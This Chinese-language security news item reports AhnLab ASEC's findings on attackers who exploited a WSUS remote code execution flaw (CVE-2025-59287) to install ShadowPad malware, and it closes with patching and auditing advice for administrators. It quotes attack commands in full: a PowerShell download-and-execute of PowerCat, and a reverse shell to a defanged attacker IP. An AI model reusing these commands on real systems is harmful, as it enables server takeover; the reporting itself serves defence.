安博士安全情报中心(ASEC)发现了一场活跃的攻击活动,威胁行为者利用 Microsoft Windows Server Update Services (WSUS) 中一个 新披露的远程代码执行(RCE)漏洞 作为武器,分发 ShadowPad。
快速武器化时间线
ASEC 发现的时间线显示,在漏洞概念验证(PoC) exploit 代码发布后,攻击武器化周期极快:
ASEC 报告称:“该漏洞的 PoC exploit 代码公开后,攻击者迅速将其武器化,通过 WSUS 服务器分发 ShadowPad 恶意软件。”
微软于10月14日发布安全公告,10月22日 PoC 代码公开,此后不久 ASEC 就通过遥测数据检测到 PowerCat 活动。
攻击者首先针对启用 WSUS 的 Windows 服务器,利用漏洞执行 PowerShell 命令:
报告指出:“攻击者针对启用 WSUS 的 Windows 服务器,利用 CVE-2025-59287 获取初始访问权限,然后使用 PowerCat…获取系统 shell(CMD)。”
安博士智能防御(ASD)基础设施记录的恶意命令包括:
powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString(
'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 154.17.26[.]41 -p 8080 -e cmd 这使攻击者获得 SYSTEM 级交互式 shell。
11月6日,攻击者再次利用同一 WSUS RCE 漏洞,此次通过 Windows 内置工具 投放并解码 ShadowPad 组件:
ASEC 详细说明:“威胁行为者…执行了 curl.exe 和 certutil.exe 等合法 Windows 工具来安装 ShadowPad 恶意软件。”
下载的组件包括:
- tmp.txt → 随后通过 certutil 解码为包含 ShadowPad 核心数据的 .tmp 文件
- dll.txt
- exe.txt
ShadowPad 很少作为独立二进制文件运行,而是 隐藏在合法可执行文件背后。.tmp 文件包含加密的后门配置和操作模块。
ASEC 总结:“此漏洞极为关键,因为它允许以系统级权限执行远程代码,显著增加潜在影响。”
运行 WSUS 的 Windows Server 环境管理员需立即采取行动:
- 应用微软针对 CVE-2025-59287 的最新安全更新。
-
限制 WSUS 访问:
- 仅允许 Microsoft Update 服务器访问 WSUS
- 阻止所有其他来源对 TCP 8530 和 8531 端口的入站流量
-
审计可疑活动:
- PowerShell、certutil.exe 、curl.exe 的执行历史
- 异常网络连接日志
发表评论
您还未登录,请先登录。
登录